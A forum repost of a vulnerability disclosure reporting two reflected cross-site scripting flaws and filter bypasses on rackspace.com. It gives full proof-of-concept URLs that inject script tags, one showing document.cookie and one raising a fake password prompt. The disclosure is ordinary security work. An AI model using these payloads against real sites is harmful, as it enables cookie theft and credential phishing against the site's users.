Jump to content
Aerosol

Rackspace Cross Site Scripting

Recommended Posts

Posted

Services Affected: http://www.Rackspace.com

Threat Level: High

Severity: High

CVSS Severity Score: 7.0

Impact type: Complete confidentiality, integrity and availability violation.

Vulnerability:

(2) Unauthenticated Cross-Site Scripting Vulnerabilities / HTML Injections

(2) Filtration Bypass

Vendor Overview

Rackspace Inc. is a managed cloud computing company based in Windcrest, Texas, USA a suburb of

San Antonio, Texas. The company has offices in Australia, U.K, Switzerland, Israel, The Netherlands,

India and Hong Kong; with data centers located in various states such as Texas, Illinois, Virginia.

Rackspace is the global leader in hybrid cloud and the founder of OpenStack, the open-source operating

system for the cloud. [1]

The company was founded in 1998 by Richard Yoo and Dirk Elmendorf in San Antonio, Texas. [1]

Proof of Concept

http://www.rackspace.com/information/legal/copyrights_trademarks?"></script><script>alert(String.fromCh
arCode(65,73,83));alert("Security");alert("Corporation");prompt("Enter-Password:");</script>

Proof of Concept

http://www.rackspace.com/pt/information/legal/mailterms?'"--
></style></script><script>alert(String.fromcharCode(65,73,83));alert(document.cookie);</script>

References

Read more: http://dl.packetstormsecurity.net/1502-exploits/Rackspace-Report.pdf

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...